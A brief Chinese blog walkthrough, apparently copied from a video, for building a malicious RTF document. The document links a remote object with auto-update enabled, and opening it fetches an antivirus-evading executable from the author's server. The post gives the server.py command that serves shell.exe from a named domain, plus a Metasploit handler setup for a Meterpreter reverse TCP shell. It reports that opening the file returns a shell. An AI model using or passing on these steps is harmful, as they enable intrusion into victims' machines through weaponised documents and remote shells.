原文链接
我也是看了一遍视频,跟着走的。

一、开启httpd服务,插入远程链接,关闭httpd服务,设置对象升级。

因为我直接用的自己的vps,所以不用再去开启。
直接把innocent.doc放在我的博客下面。

1、新建doc,插入,对象,链接到文件。

2、保存为rtf格式。

3、

# systemctl stop httpd.service

4、用Sublime 打开保存好的rtf.

在 \objautlink\ 后面插入 objupdate,保存。


二、MSFvenom生成免杀exe。

原文里面的exe是不免杀的,会被360等查杀。
这里用一个免杀的exe,免杀来自Luan

1、直接把生成的exe,放到/var/www/html/下面,然后运行server.py

# python server.py 80 http://www.sh0w.top/shell.exe /var/www/html/shell.exe

2、msfconsole


# msfconsole
# use exploit/multi/handler
# set payload windows/meterpreter/reverse_tcp
# set LHOST x.x.x.x
# set LPORT 10086
# run

这里已经弹回来了。

4、打开你的rtf,运行就可以了。就弹回来了。